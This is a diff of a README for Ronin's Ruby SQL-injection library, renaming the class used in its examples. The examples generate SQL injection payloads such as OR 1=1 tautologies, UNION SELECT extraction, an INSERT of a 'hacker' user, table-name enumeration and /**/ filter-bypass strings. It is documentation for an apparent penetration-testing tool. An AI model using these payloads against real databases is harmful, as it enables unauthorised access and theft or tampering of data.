@@ -61,7 +61,7 @@ string.sql_decode
6161Injecting a ` 1=1 ` test into a Integer comparison:
6262
6363``` ruby
64- sqli = Ronin ::Code ::SQL :: Injection .new
64+ sqli = Ronin ::Code ::SQLI .new
6565sqli.or { 1 == 1 }
6666puts sqli
6767# 1 OR 1=1
@@ -70,7 +70,7 @@ puts sqli
7070Injecting a ` 1=1 ` test into a String comparison:
7171
7272``` ruby
73- sqli = Ronin ::Code ::SQL :: Injection .new (escape: :string )
73+ sqli = Ronin ::Code ::SQLI .new (escape: :string )
7474sqli.or { string(1 ) == string(1 ) }
7575puts sqli
7676# 1' OR '1'='1
@@ -79,7 +79,7 @@ puts sqli
7979Columns:
8080
8181``` ruby
82- sqli = Ronin ::Code ::SQL :: Injection .new
82+ sqli = Ronin ::Code ::SQLI .new
8383sqli.and { admin == 1 }
8484puts sqli
8585# 1 AND admin=1
@@ -88,7 +88,7 @@ puts sqli
8888Clauses:
8989
9090``` ruby
91- sqli = Ronin ::Code ::SQL :: Injection .new
91+ sqli = Ronin ::Code ::SQLI .new
9292sqli.or { 1 == 1 }.limit(0 )
9393puts sqli
9494# 1 OR 1=1 LIMIT 0
@@ -97,7 +97,7 @@ puts sqli
9797Statements:
9898
9999``` ruby
100- sqli = Ronin ::Code ::SQL :: Injection .new
100+ sqli = Ronin ::Code ::SQLI .new
101101sqli.and { 1 == 0 }
102102sqli.insert.into(:users ).values(' hacker' ,' passw0rd' ,' t' )
103103puts sqli
@@ -107,7 +107,7 @@ puts sqli
107107Sub-Statements:
108108
109109``` ruby
110- sqli = Ronin ::Code ::SQL :: Injection .new
110+ sqli = Ronin ::Code ::SQLI .new
111111sqli.union { select (1 ,2 ,3 ,4 ,id).from(users) }
112112puts sqli
113113# 1 UNION SELECT (1,2,3,4,id) FROM users
@@ -116,7 +116,7 @@ puts sqli
116116Test if a table exists:
117117
118118``` ruby
119- sqli = Ronin ::Code ::SQL :: Injection .new
119+ sqli = Ronin ::Code ::SQLI .new
120120sqli.and { select (count).from(:users ) == 1 }
121121puts sqli
122122# 1 AND (SELECT COUNT(*) FROM users)=1
@@ -125,7 +125,7 @@ puts sqli
125125Create errors by using non-existent tables:
126126
127127``` ruby
128- sqli = Ronin ::Code ::SQL :: Injection .new (escape: :string )
128+ sqli = Ronin ::Code ::SQLI .new (escape: :string )
129129sqli.and { non_existent_table == ' 1' }
130130puts sqli
131131# 1' AND non_existent_table='1
@@ -134,7 +134,7 @@ puts sqli
134134Dumping all values of a column:
135135
136136``` ruby
137- sqli = Ronin ::Code ::SQL :: Injection .new (escape: :string )
137+ sqli = Ronin ::Code ::SQLI .new (escape: :string )
138138sqli.or { username.is_not(null) }.or { username == ' ' }
139139puts sqli
140140# 1' OR username IS NOT NULL OR username='
@@ -143,7 +143,7 @@ puts sqli
143143Enumerate through database table names:
144144
145145``` ruby
146- sqli = Ronin ::Code ::SQL :: Injection .new
146+ sqli = Ronin ::Code ::SQLI .new
147147sqli.and {
148148 ascii(
149149 lower(
@@ -160,7 +160,7 @@ puts sqli
160160Find user supplied tables via the ` sysObjects ` table:
161161
162162``` ruby
163- sqli = Ronin ::Code ::SQL :: Injection .new
163+ sqli = Ronin ::Code ::SQLI .new
164164sqli.union_all {
165165 select (1 ,2 ,3 ,4 ,5 ,6 ,name).from(sysObjects).where { xtype == ' U' }
166166}
@@ -171,7 +171,7 @@ puts sqli.to_sql(terminate: true)
171171Bypass filters using ` /**/ ` instead of spaces:
172172
173173``` ruby
174- sqli = Ronin ::Code ::SQL :: Injection .new
174+ sqli = Ronin ::Code ::SQLI .new
175175sqli.union { select (1 ,2 ,3 ,4 ,id).from(users) }
176176puts sqli.to_sql(space: ' /**/' )
177177# 1/**/UNION/**/SELECT/**/(1,2,3,4,id)/**/FROM/**/users